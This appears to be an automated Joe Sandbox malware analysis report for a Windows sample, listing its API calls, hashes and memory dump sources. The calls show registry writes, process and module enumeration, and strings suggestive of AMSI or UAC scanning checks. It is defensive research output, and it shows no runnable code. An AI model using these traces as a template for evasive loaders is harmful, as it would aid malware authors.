                                                                • API ID: AddressHandleModuleProc$Virtual$CurrentLibraryLoadMemoryProcessProtectWrite
                                                                • String ID:
                                                                • API String ID: 3496194007-0
                                                                • Opcode ID: 1adb014de1a2b7f29644880330c6341a881c61bfa37de3ea43b9287ac6767677
                                                                • Instruction ID: 05585ea647e058226c18c32c0701c444ede16eb2308853919986671c014aa6db
                                                                • Opcode Fuzzy Hash: 1adb014de1a2b7f29644880330c6341a881c61bfa37de3ea43b9287ac6767677
                                                                • Instruction Fuzzy Hash: 57114CB1E4470DAFE704FBE5DC81E6EB7EAEB85700F500464A214A76D0DB38A9108B24
                                                                APIs
                                                                • RegOpenKeyA.ADVAPI32(?,00000000,0293F644), ref: 0291D354
                                                                • RegSetValueExA.ADVAPI32(00000864,00000000,00000000,00000001,00000000,0000001C,00000000,0291D3BF), ref: 0291D38C
                                                                • RegCloseKey.ADVAPI32(00000864,00000864,00000000,00000000,00000001,00000000,0000001C,00000000,0291D3BF), ref: 0291D397
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenValue
                                                                • String ID:
                                                                • API String ID: 779948276-0
                                                                • Opcode ID: d965a4225a0200249f8e7f0b2c13bd5b98b3bd907eae5101c48c15ac53f631da
                                                                • Instruction ID: 11abd3d2ed88f17c2d34f2104150ac275cafb559cc26e36410c7699f40bb05b5
                                                                • Opcode Fuzzy Hash: d965a4225a0200249f8e7f0b2c13bd5b98b3bd907eae5101c48c15ac53f631da
                                                                • Instruction Fuzzy Hash: 67110A71A0420CAFEB00EBA8D8C1D6E7BEDEB89714F501471BA14D76A0D730EE51DE60
                                                                APIs
                                                                • RegOpenKeyA.ADVAPI32(?,00000000,0293F644), ref: 0291D354
                                                                • RegSetValueExA.ADVAPI32(00000864,00000000,00000000,00000001,00000000,0000001C,00000000,0291D3BF), ref: 0291D38C
                                                                • RegCloseKey.ADVAPI32(00000864,00000864,00000000,00000000,00000001,00000000,0000001C,00000000,0291D3BF), ref: 0291D397
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenValue
                                                                • String ID:
                                                                • API String ID: 779948276-0
                                                                • Opcode ID: 88438a3781070a75d5e7a5b665d5cd86b10a61c072c887517b55013db86d6b41
                                                                • Instruction ID: dae4a0bd78d2a7f0dad98ea966402adff2f69e419ece1b5dbeeb1c7725af258a
                                                                • Opcode Fuzzy Hash: 88438a3781070a75d5e7a5b665d5cd86b10a61c072c887517b55013db86d6b41
                                                                • Instruction Fuzzy Hash: E0111C71A0420CAFEB00EBA8D8C1D6E7BEDEB89714F501471BA14D76A0D730EA51DE60
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: ClearVariant
                                                                • String ID:
                                                                • API String ID: 1473721057-0
                                                                • Opcode ID: 77201f0608cdf0e6bb5706455c83fe758a1c90666a7f7593dde87d1a8bdfdfea
                                                                • Instruction ID: fc6194751b3b4f3c8feef15b93acb662b9b494fa55da198915dd4f70077b8a36
                                                                • Opcode Fuzzy Hash: 77201f0608cdf0e6bb5706455c83fe758a1c90666a7f7593dde87d1a8bdfdfea
                                                                • Instruction Fuzzy Hash: 38F0F666B0411C8FDB207B38C8C466D3B9E9F847407449C36E4C6DB2C9CB24DC05CB62
                                                                APIs
                                                                • SysFreeString.OLEAUT32(?), ref: 02917352
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: FreeString
                                                                • String ID: H
                                                                • API String ID: 3341692771-2852464175
                                                                • Opcode ID: d698fa123a9de89382e8b54b24f2e5780c037bfa107c682604f2f096ec509d80
                                                                • Instruction ID: 33b8cb01c53913d44aa49e06bec8a98da7f437703ba555f33702fe9e7ce8c23b
                                                                • Opcode Fuzzy Hash: d698fa123a9de89382e8b54b24f2e5780c037bfa107c682604f2f096ec509d80
                                                                • Instruction Fuzzy Hash: 97B1C274A01609EFDB14CF9AD980A9DFBF6FF89314F248569E805AB364D730A846CF50
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 77abbd4f213636ca243bb1d13908da3d5c670813edacc6e7bc1d7e6a9bae2559
                                                                • Instruction ID: dbfbda11607731f6527cecb10c5def6c104d62df67c54f9cb143da7939458e10
                                                                • Opcode Fuzzy Hash: 77abbd4f213636ca243bb1d13908da3d5c670813edacc6e7bc1d7e6a9bae2559
                                                                • Instruction Fuzzy Hash: 4B41AC75D48208DFDF24DF28E4C47AA3BE9FF89314F15692AEA09972C0C7309894CB41
                                                                APIs
                                                                • VariantCopy.OLEAUT32(00000000,00000000), ref: 0290E6F9
                                                                  • Part of subcall function 0290E2DC: VariantClear.OLEAUT32(?), ref: 0290E2EB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearCopy
                                                                • String ID:
                                                                • API String ID: 274517740-0
                                                                • Opcode ID: f7d6229ee1af9f4b5506cc721c92a5a76587ccbc4912b617a231d74e482508b6
                                                                • Instruction ID: 39f4fd14dbe854a31c5bd53cbea1faf0a90efce235c01a1993b6b66f825b2e89
                                                                • Opcode Fuzzy Hash: f7d6229ee1af9f4b5506cc721c92a5a76587ccbc4912b617a231d74e482508b6
                                                                • Instruction Fuzzy Hash: D6118660B0421C8FCB20AF69C8C466677DADFC57507005C6AE6CA8B2D5DB30DC41CBA2
                                                                APIs
                                                                • SysFreeString.OLEAUT32 ref: 02904C1A
                                                                • SysReAllocStringLen.OLEAUT32(?,?,?), ref: 02904C62
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: String$AllocFree
                                                                • String ID:
                                                                • API String ID: 344208780-0
                                                                • Opcode ID: 0dfb876fbd1d1730c24048f7b13a568e459e49fe3a1b4105be2b01b296b86e1a
                                                                • Instruction ID: 1e4005cf4f0cc430b2bc1adc830c59cca0dba0596fe2161b5431fa2f3c4126cd
                                                                • Opcode Fuzzy Hash: 0dfb876fbd1d1730c24048f7b13a568e459e49fe3a1b4105be2b01b296b86e1a
                                                                • Instruction Fuzzy Hash: 6DE0C2B45002095EEB189E1989C0B77336EAFD0706B28EA9CAA018F1C0EB308800CA30
                                                                APIs
                                                                • SysFreeString.OLEAUT32 ref: 02904C1A
                                                                • SysAllocStringLen.OLEAUT32(?,?), ref: 02904D07
                                                                • SysFreeString.OLEAUT32(00000000), ref: 02904D19
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: String$Free$Alloc
                                                                • String ID:
                                                                • API String ID: 986138563-0
                                                                • Opcode ID: fbcbc079c08d05a5a061a6d9bb9e7b58ab4b23161b06f71646831e832a5bb596
                                                                • Instruction ID: 49b82d4bc28fef33cbb4c8c190815a694ba9cf70e570d83a55a830798a9bd1b9
                                                                • Opcode Fuzzy Hash: fbcbc079c08d05a5a061a6d9bb9e7b58ab4b23161b06f71646831e832a5bb596
                                                                • Instruction Fuzzy Hash: 5FC012B810520A6EAB082B604EC493B2B2DAEC534034018A9AA14C80E0E724C841AC20
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: InitVariant
                                                                • String ID:
                                                                • API String ID: 1927566239-0
                                                                • Opcode ID: e8d69a1a8ac1f396f821378c3d4b46892423d89040ec255c12b65c9ea9702c3c
                                                                • Instruction ID: 8bea8f27bbf6b6e807038f2d30f1bb631603a83312c31819f8bd2f1d2ca3ef0b
                                                                • Opcode Fuzzy Hash: e8d69a1a8ac1f396f821378c3d4b46892423d89040ec255c12b65c9ea9702c3c
                                                                • Instruction Fuzzy Hash: EF314D71A0420CAFDB15DEA8C9C4AAA7BACEB4C304F444965FA99D32D0D734D994CB62
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(0000C087,?,?,?,00000000,029470C7,?,?,?,?,?), ref: 02947160
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002947000.00000040.00001000.00020000.00000000.sdmp, Offset: 02947000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2947000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                                                                • Instruction ID: 52ada63360e4ee8d91d53ef81b6e6c500d9b1aa64263f58dcce2ad3704645bd5
                                                                • Opcode Fuzzy Hash: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                                                                • Instruction Fuzzy Hash: 13F0A97260431F5BEB208DD5CC54EF7F3DCAE891657050929E846D7209FB25D801C760
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(02900000,?,00000105), ref: 02905832
                                                                  • Part of subcall function 02905A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02905A94
                                                                  • Part of subcall function 02905A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905AB2
                                                                  • Part of subcall function 02905A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905AD0
                                                                  • Part of subcall function 02905A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02905AEE
                                                                  • Part of subcall function 02905A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02905B37
                                                                  • Part of subcall function 02905A78: RegQueryValueExA.ADVAPI32(?,02905CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02905B7D,?,80000001), ref: 02905B55
                                                                  • Part of subcall function 02905A78: RegCloseKey.ADVAPI32(?,02905B84,00000000,00000000,00000005,00000000,02905B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02905B77
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                • String ID:
                                                                • API String ID: 2796650324-0
                                                                • Opcode ID: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
                                                                • Instruction ID: 16f02471ba9fe13a574cc3a7b80487851a15153edd7f3eeb9609745ce476e814
                                                                • Opcode Fuzzy Hash: 8d2262c70beaae2bbfdede8a2f275eb551cfb6ca49d82510be69373b1f735333
                                                                • Instruction Fuzzy Hash: 05E06571A002188FCB14DE6888C0A8637D8BF08750F8109A5ED58DF38AD3B0DD608FE0
                                                                APIs
                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02907DA0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                • Instruction ID: 1528a2672e1e1620418b0281b5a3596dc00ba3e5da5ef5e322f678c02348a156
                                                                • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                • Instruction Fuzzy Hash: 81D012722091146AD220955A5C84EE75ADDCBC5771F10062EB698C71C0D7208C0186B1
                                                                APIs
                                                                  • Part of subcall function 02919EB0: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0291A137,?,?,0291A1C9,00000000,0291A2A5), ref: 02919EC4
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02919EDC
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02919EEE
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02919F00
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02919F12
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02919F24
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02919F36
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02919F48
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02919F5A
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02919F6C
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02919F7E
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02919F90
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02919FA2
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02919FB4
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02919FC6
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02919FD8
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02919FEA
                                                                • Process32First.KERNEL32(?,00000128), ref: 0291A15D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$FirstHandleModuleProcess32
                                                                • String ID:
                                                                • API String ID: 2774106396-0
                                                                • Opcode ID: e790caa397448e4931962de20df82d37cfc03ae9caaace0e83eede1f235c0b69
                                                                • Instruction ID: a25a28c5d341e297ec71dd8b50c6ef6fdf41a8a0b056526f096803648528cabd
                                                                • Opcode Fuzzy Hash: e790caa397448e4931962de20df82d37cfc03ae9caaace0e83eede1f235c0b69
                                                                • Instruction Fuzzy Hash: B1C08063A02124179B2069F52C884D3474DCD461F73044862B509D3101D3754C10D590
                                                                APIs
                                                                  • Part of subcall function 02919EB0: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0291A137,?,?,0291A1C9,00000000,0291A2A5), ref: 02919EC4
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02919EDC
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02919EEE
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02919F00
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02919F12
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02919F24
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02919F36
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02919F48
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02919F5A
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02919F6C
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02919F7E
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02919F90
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02919FA2
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02919FB4
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02919FC6
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02919FD8
                                                                  • Part of subcall function 02919EB0: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02919FEA
                                                                • Process32Next.KERNEL32(?,00000128), ref: 0291A17D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$HandleModuleNextProcess32
                                                                • String ID:
                                                                • API String ID: 2237597116-0
                                                                • Opcode ID: 7df12df6232c38436d32e84e09366a639ad7ccd982716454dde86a639c2cd844
                                                                • Instruction ID: 9fa18e603e75998afbc597b15d5c753b19c99717959a0cacab8b090f6282e47c
                                                                • Opcode Fuzzy Hash: 7df12df6232c38436d32e84e09366a639ad7ccd982716454dde86a639c2cd844
                                                                • Instruction Fuzzy Hash: E3C08073A02124175F2069F63C844D3474DCD451F73040C62B515D3101E3254C10D190
                                                                APIs
                                                                • GetFileAttributesA.KERNEL32(00000000,?,0291E18C,ScanString,0293F358,029272FC,OpenSession,0293F358,029272FC,ScanString,0293F358,029272FC,UacScan,0293F358,029272FC,UacInitialize), ref: 02907E13
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 0e95aad3414f9b9c2a2109699958fa49b390097b3f52a26050f892d7429b04e1
                                                                • Instruction ID: 2e5da3f78dccf016117522990745bd99cc4fb1d8176a61b730efcf1eb642c5ea
                                                                • Opcode Fuzzy Hash: 0e95aad3414f9b9c2a2109699958fa49b390097b3f52a26050f892d7429b04e1
                                                                • Instruction Fuzzy Hash: C4C08CA16072080E6A5065FC0CC459B428C09841383642A71E039C62E2D321A8232810
                                                                APIs
                                                                • GetFileAttributesA.KERNEL32(00000000,?,02921221,ScanString,0293F358,029272FC,OpenSession,0293F358,029272FC,OpenSession,0293F358,029272FC,ScanBuffer,0293F358,029272FC,ScanString), ref: 02907E37
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 402d99361340c0d933afbb412631b9ac4ad4834bfd450701127e11a6c8c5f0c3
                                                                • Instruction ID: ef8899aaa4fb249eebb8d9e094333032543f87b5af2f1f34506f7c2fa180042e
                                                                • Opcode Fuzzy Hash: 402d99361340c0d933afbb412631b9ac4ad4834bfd450701127e11a6c8c5f0c3
                                                                • Instruction Fuzzy Hash: 5CC08CA060320C0E6E9065FC1CC068B428D0D841343603A31E03CD62E2D311A8322810
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: FreeString
                                                                • String ID:
                                                                • API String ID: 3341692771-0
                                                                • Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                                • Instruction ID: 06ca935c9b844225799f0f4b174ebf980334b3db410e16338633fc971058759f
                                                                • Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                                • Instruction Fuzzy Hash: 3EC012A26002384FEB215A989CC079562CCDB49395B1410A1E508D7280E3609C005A64
                                                                APIs
                                                                • timeSetEvent.WINMM(?,00000000,Function_00027D78,00000000,00000001), ref: 02927D94
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: Eventtime
                                                                • String ID:
                                                                • API String ID: 2982266575-0
                                                                • Opcode ID: f319377a747f52c5b3744fc910e00ee68094a6f24ce9f7597065ca0b7ca9b673
                                                                • Instruction ID: 3ff7930bf9610d4b4f2708855f65909ebf841c26a094aaa4715b0396ffa06e0f
                                                                • Opcode Fuzzy Hash: f319377a747f52c5b3744fc910e00ee68094a6f24ce9f7597065ca0b7ca9b673
                                                                • Instruction Fuzzy Hash: 71C092F1BD53507EF6205AB55CC2F73618DEB44B01F100912B600EE6C1D5E248104E24
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004), ref: 029015E2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: eddf2043077eb8cf831c19769000fcf6f6f7e1d38a5d13da91bf8d8bcb9e6f33
                                                                • Instruction ID: 3b6bbf51b5411bfdc435d1be33a7553caca89dbeef972b8d01c5d3958d0a9846
                                                                • Opcode Fuzzy Hash: eddf2043077eb8cf831c19769000fcf6f6f7e1d38a5d13da91bf8d8bcb9e6f33
                                                                • Instruction Fuzzy Hash: BEF017F0B557004FEB05DFB999813267BD6E789348F24857AEA0AEB3D8E77184128B10
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 029016A4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: f6ace03c0a34ab6877b6ce19723b253339304f0752fc9b4d55a16ad1c507fd9e
                                                                • Instruction ID: 941f22338c48c7919ca221dc46625a4b3074624cb7f0f245b5ce0483ad05dfb8
                                                                • Opcode Fuzzy Hash: f6ace03c0a34ab6877b6ce19723b253339304f0752fc9b4d55a16ad1c507fd9e
                                                                • Instruction Fuzzy Hash: ACF090B2A447996FE7119E5A9CC0792BBD4FF44314F050539EA4997380D770A8108B94
                                                                APIs
                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02901704
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2003854445.0000000002900000.00000040.00001000.00020000.00000000.sdmp, Offset: 02900000, based on PE: true
                                                                • Associated: 00000000.00000002.2003854445.0000000002929000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2900000_HGTQP09643009.jbxd
                                                                Similarity
                                                                • API ID: FreeVirtual
                                                                • String ID:
                                                                • API String ID: 1263568516-0
                                                                • Opcode ID: d4a7782802fa7c4241f7d70762e1ec9342a410fd30a71d37dc181300ee996d2b
                                                                • Instruction ID: 40e8cc9821dce34825d5e37245dd366b298d94e05bdd3e8f12d2c08a1da2649e
                                                                • Opcode Fuzzy Hash: d4a7782802fa7c4241f7d70762e1ec9342a410fd30a71d37dc181300ee996d2b
                                                                • Instruction Fuzzy Hash: 7CE02C713003046FE7205A7D4CC0B22BBCDEF88334F240A75F209CB2C1C2A0E8008B24
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0291A137,?,?,0291A1C9,00000000,0291A2A5), ref: 02919EC4
                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02919EDC
                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02919EEE
                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02919F00
                                                                • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02919F12
                                                                • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02919F24
